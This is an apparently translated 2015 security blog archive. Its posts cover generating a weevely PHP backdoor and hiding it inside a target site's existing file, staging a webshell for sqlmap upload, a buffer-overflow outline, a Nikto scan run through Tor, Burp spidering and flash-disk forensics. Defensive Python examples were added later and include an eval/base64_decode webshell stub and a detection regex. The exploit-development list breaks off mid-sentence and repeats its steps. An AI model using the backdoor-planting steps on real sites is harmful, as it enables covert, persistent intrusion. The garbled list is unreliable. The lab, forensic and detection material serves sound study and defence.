Monday, 07 September 2015

Make Backdoor with Weevely

1. Once backdoor.php has been uploaded to the web server, we will try to insert a PHP script generated with weevely into the site and hide it inside one of the target site's own PHP files.
# weevely generate 1234 pintu.php
# ls

2. Copy the script from the PHP file we created earlier into a PHP file that already exists on the target site. I will insert the script into the view_source_all.php file in the web directory.
# weevely http://<target URL or IP address>/<backdoor name> <password>
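A defender-side check for the technique described above (a generated PHP agent hidden inside a legitimate file such as view_source_all.php), added here as an example and not code from the original post: it baselines the hashes of every PHP file under a web root, re-audits later, and flags files that changed or that contain the decode-and-eval calls webshells depend on. The web root, file names and file contents are constructed for the demonstration.

```python
# Added example, not code from the original post: compare every PHP file under a
# web root against a hash baseline and flag calls typical of obfuscated webshells
# (which decode and evaluate their real payload at runtime). The web root and the
# file contents below are constructed for the demonstration.
import hashlib
import re
import tempfile
from pathlib import Path

# Calls rarely seen in ordinary site code but typical of webshells.
SUSPICIOUS = re.compile(
    r"\b(eval|assert|base64_decode|gzinflate|str_rot13|create_function)\s*\(",
    re.IGNORECASE)

def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()

def baseline(webroot: Path) -> dict:
    """Record a trusted hash for every .php file under the web root."""
    return {str(p.relative_to(webroot)): sha256_of(p) for p in webroot.rglob("*.php")}

def audit(webroot: Path, known: dict) -> dict:
    """Return {relative path: findings} for files that changed or look suspicious."""
    findings = {}
    for p in webroot.rglob("*.php"):
        rel, problems = str(p.relative_to(webroot)), []
        if rel not in known:
            problems.append("new file not in baseline")
        elif known[rel] != sha256_of(p):
            problems.append("hash differs from baseline")
        hits = sorted({m.group(1).lower()
                       for m in SUSPICIOUS.finditer(p.read_text(errors="ignore"))})
        if hits:
            problems.append("suspicious calls: " + ", ".join(hits))
        if problems:
            findings[rel] = problems
    return findings

def demo() -> dict:
    """Build a constructed web root, baseline it, tamper with one file, re-audit."""
    root = Path(tempfile.mkdtemp())
    (root / "index.php").write_text("<?php echo 'hello'; ?>")
    (root / "view_source_all.php").write_text("<?php highlight_file(__FILE__); ?>")
    known = baseline(root)
    # Simulated tampering: an eval-based stub appended to the legitimate file.
    with open(root / "view_source_all.php", "a") as f:
        f.write("\n<?php eval(base64_decode($_POST['x'])); ?>")
    return audit(root, known)
```

In practice the baseline is taken from a known-good deployment and stored off the web server, so that a tampered host cannot also rewrite the reference hashes.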



Saturday, 05 September 2015

Digital Forensics

Digital forensics is the science of analysing digital evidence. Digital evidence is extracted from electronic evidence such as personal computers, mobile phones, notebooks, servers, or any technological device that has storage media and can be analysed.

Steps of digital forensics
1. Identification
    means choosing the object that will be forensically examined. Examples: PC, mobile phone, notebook, flash disk, server.
2. Preservation
   - chain of custody (to ensure it is known who held the evidence and when it last changed hands)
   - labeling
   - imaging/cloning
3. Examination
4. Analysis
5. Reporting/product

The first step is to check the position (device node) of the flash disk. The goal is to be sure which data we are going to examine, so that we do not accidentally format the PC's own disk. If the flash disk was previously formatted with VeraCrypt it must be reformatted.
1. To find the device of the flash disk we will examine, open a terminal:
  # fdisk -l   (or dmesg)

2. To reformat the flash disk from its VeraCrypt state back to a normal partition:
 # cfdisk /dev/sdb1
    - delete
    - new
    - primary
    - write
    - type: yes (to confirm)
    - quit
 # mkfs.fat /dev/sdb1
After these commands the flash disk has been reformatted.

3. Now start the forensic examination of the flash disk to find out what data has been erased and can be read back (manual way).
 # fdisk -l
 # testdisk /dev/sdb
   - Proceed
   - Intel
   - Analyse
   - Quick Search
   - Continue
   - press P: list files
Red: data that was erased earlier and will be recovered.
White: data still stored on the flash disk.
To check the recovered files, look in the root/home directory.

4. The next way is automatic recovery.
# fdisk -l
# photorec /dev/sdb
  - press Enter through the menus
The previously erased data is recovered and immediately stored in a single folder in the home directory, named recup_dir.
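Why photorec can bring back files that testdisk no longer lists: it ignores the file system and carves by file signature. The minimal carver below is an added example (not code from the original post and not photorec's own code); the raw "disk image" and the signature table are constructed for the demonstration.

```python
# Added example, not code from the original post: a minimal signature-based
# carver in the spirit of photorec. It scans a raw image for header/footer pairs,
# so files whose directory entries were deleted are still found. The image and
# the signature subset below are constructed for the demonstration.
import hashlib

# (header, footer) pairs for a few common types
SIGNATURES = {
    "jpg": (b"\xff\xd8\xff", b"\xff\xd9"),
    "png": (b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82"),
    "pdf": (b"%PDF-", b"%%EOF"),
}

def carve(image: bytes) -> list:
    """Return [(offset, type, data)] for every complete header/footer pair found."""
    found = []
    for ftype, (head, tail) in SIGNATURES.items():
        pos = 0
        while (start := image.find(head, pos)) != -1:
            end = image.find(tail, start + len(head))
            if end == -1:          # header without footer: truncated, skip it
                break
            end += len(tail)
            found.append((start, ftype, image[start:end]))
            pos = end
    return sorted(found)

def build_image() -> bytes:
    """Constructed image: free space, a JPEG, a PDF and an orphan PNG header."""
    jpg = b"\xff\xd8\xff\xe0" + b"J" * 40 + b"\xff\xd9"
    pdf = b"%PDF-1.4\n" + b"P" * 60 + b"\n%%EOF"
    return (b"\x00" * 100 + jpg + b"\x00" * 50 + pdf
            + b"\x00" * 30 + b"\x89PNG\r\n\x1a\n" + b"X" * 10)  # PNG with no IEND

def recover_report(image: bytes) -> list:
    """Summarise carved files as (offset, type, length, sha256 prefix), like a recup_dir listing."""
    return [(off, t, len(d), hashlib.sha256(d).hexdigest()[:12]) for off, t, d in carve(image)]
```

Record the hash of each carved file at recovery time; it is what the chain-of-custody step above needs in order to show later that the evidence was not altered.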


Friday, 04 September 2015

The Function of Veracrypt

VeraCrypt is one of the tools on Linux created for data security and for securing the storage device itself. With VeraCrypt we can divide a flash disk into several partitions and sort out which ones will be protected with VeraCrypt's security and which do not need it.

Another safeguard for files applies when sending data via email, such as Gmail, where there is something called a public key and a secret key. The public key serves as the means by which others can send us encrypted data. The secret key serves as the means by which only the person concerned can access the data, or the storage device, if the object is lost.

Steps of exploit development

1. Do fuzzing and make sure the application crashes (errors).

2. Debug the application and make sure the EIP register is overwritten by the data we send.

3. Calculate at which byte of the buffer the EIP register is overwritten, using pattern_create and pattern_offset.

4. Look for a location to place the payload (in this case the ESP register, because it is also overwritten by the buffer we sent).

5. Look for an address that directs us to the payload, to be placed in the EIP register (in this case the address of a JMP/CALL ESP).

6. Run the fuzzer that contains the address of

2. If the EIP register is overwritten by the data we send, count at which byte the EIP register is overwritten, using pattern_create and pattern_offset.

3. Find the address of JMP ESP / CALL ESP to direct the EIP register to the stack (ESP).

4. Run the fuzzer and make sure the application jumps to ESP.

5. Create a simple payload using msfvenom.


 +-----------------------+-------------+-------------------+
 |  DATA (junk bytes)    |     EIP     |     PAYLOAD       |
 +-----------------------+-------------+-------------------+
                                |               ^
                                +---------------+
                         address of jmp/call esp
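How pattern_create and pattern_offset arrive at the number in step 3, shown as an added example (not code from the original post and not the Metasploit tools themselves): the pattern is built from upper/lower/digit triplets so that any 4-byte window occurs at one offset only, and the value read from EIP is a little-endian view of four of those bytes.

```python
# Added example, not code from the original post: the cyclic-pattern method that
# pattern_create / pattern_offset use to find which byte of the buffer lands in EIP.
from itertools import product
from string import ascii_uppercase, ascii_lowercase, digits

def pattern_create(length: int) -> str:
    """Cyclic pattern (Aa0Aa1Aa2...) of the given length; every 4-byte window is unique."""
    out = []
    for u, l, d in product(ascii_uppercase, ascii_lowercase, digits):
        out.append(u + l + d)
        if len(out) * 3 >= length:
            break
    return "".join(out)[:length]

def pattern_offset(pattern: str, value) -> int:
    """Offset of a 4-byte value in the pattern, or -1 if absent.

    value may be the 4 characters themselves or the integer read from a
    little-endian register: 0x41336141 -> bytes 41 61 33 41 -> 'Aa3A'.
    """
    if isinstance(value, int):
        value = value.to_bytes(4, "little").decode("ascii")
    return pattern.find(value)

def eip_offset_from_crash(buffer_len: int, eip: int) -> int:
    """The step-3 workflow: send pattern_create(buffer_len), read EIP, compute the offset."""
    return pattern_offset(pattern_create(buffer_len), eip)
```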

Thursday, 03 September 2015

Upload a Backdoor using sqlmap

Before we proceed to upload a backdoor with sqlmap, we must understand that the steps of the vulnerability stage (getting into the database and obtaining the password from the server) have already been carried out. Only then can we move on to the next stage, uploading a backdoor with sqlmap.
Note: the target is Metasploit running inside VirtualBox.

1. Open a terminal and run:
 # cd /usr/share/webshells/php/
 # ls
 # cp php-backdoor.php /root/
 # ls

2. Then go back to the terminal session in which we had already entered the target's database.

Remember that for the backdoor upload via sqlmap we carry out the stages until we are actually inside the target server, one of which is getting into the database; if the database has a password we must crack that password first, and only then upload the backdoor with sqlmap.

Wednesday, 02 September 2015

Scan using Nikto

1. Scanning with Nikto is very specific, so first activate Tor in the terminal:
# service tor start

2. The Nikto application can be opened from the Linux Applications menu or from the terminal.
* Applications: Kali Linux - Web Applications - Web Vulnerability Scanners - nikto
* Terminal: nikto

3. To run a scan:
# nikto -host <target web address / URL>


Scan with Spider in Burp Suite

The function of the Spider tool is that of a crawler: it actively and passively crawls the web application to obtain web page data and directories, and even submits forms and obtains their variables.

1. Open the Mutillidae web page that shows the login form.

2. Open Burp Suite and enable the Burp Suite proxy. Then fill in the login so that the request appears in Burp Suite.

3. Click Proxy - Forward - Target so the target website appears. Then point the cursor at the target, right-click and select "Spider this branch".

4. To see the scan results, click on one of the files that was scanned and click Response; there will be a description of that file.
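What the two scans in this post look like from the server side, as an added example (not code from the original post): Nikto announces itself in its User-Agent header, and both a Nikto run and a spider crawl show up as one client requesting many distinct paths and collecting 404s. The log lines are constructed in Apache combined format; the thresholds are assumptions to tune per site.

```python
# Added example, not code from the original post: flag Nikto scans and spider
# crawls in web server access logs. SAMPLE_LOG and the thresholds are constructed.
import re
from collections import defaultdict

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')

SAMPLE_LOG = """\
10.0.0.5 - - [02/Sep/2015:10:00:01 +0700] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.9 - - [02/Sep/2015:10:00:02 +0700] "GET /cgi-bin/test-cgi HTTP/1.1" 404 210 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000001)"
10.0.0.9 - - [02/Sep/2015:10:00:02 +0700] "GET /admin/ HTTP/1.1" 404 210 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000002)"
10.0.0.9 - - [02/Sep/2015:10:00:02 +0700] "GET /phpinfo.php HTTP/1.1" 404 210 "-" "Mozilla/5.00 (Nikto/2.1.5) (Evasions:None) (Test:000003)"
10.0.0.7 - - [02/Sep/2015:10:00:03 +0700] "GET /mutillidae/index.php?page=login.php HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
10.0.0.7 - - [02/Sep/2015:10:00:03 +0700] "GET /mutillidae/index.php?page=home.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
10.0.0.7 - - [02/Sep/2015:10:00:03 +0700] "POST /mutillidae/index.php?page=login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.7 - - [02/Sep/2015:10:00:03 +0700] "GET /mutillidae/robots.txt HTTP/1.1" 200 100 "-" "Mozilla/5.0"
10.0.0.7 - - [02/Sep/2015:10:00:03 +0700] "GET /mutillidae/passwords/ HTTP/1.1" 404 200 "-" "Mozilla/5.0"
"""

def parse(log: str):
    """Yield (ip, method, path, status, user_agent) for each well-formed line."""
    for line in log.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.group(1), m.group(2), m.group(3), int(m.group(4)), m.group(5)

def detect_scanners(log: str, max_paths_per_ip: int = 4, max_404_per_ip: int = 3) -> dict:
    """Return {ip: reasons} for clients whose traffic looks like a scanner or crawler."""
    paths, errors, reasons = defaultdict(set), defaultdict(int), defaultdict(list)
    for ip, method, path, status, ua in parse(log):
        paths[ip].add(path)
        if status == 404:
            errors[ip] += 1
        if "nikto" in ua.lower() and "User-Agent advertises Nikto" not in reasons[ip]:
            reasons[ip].append("User-Agent advertises Nikto")
    for ip in paths:
        if len(paths[ip]) >= max_paths_per_ip:   # crawl: many distinct URLs from one client
            reasons[ip].append(f"{len(paths[ip])} distinct paths requested")
        if errors[ip] >= max_404_per_ip:          # probing: guessed paths that do not exist
            reasons[ip].append(f"{errors[ip]} responses were 404")
    return {ip: r for ip, r in reasons.items() if r}
```

The User-Agent check only catches a scanner that does not disguise itself, which is why the path and 404 counters are kept alongside it.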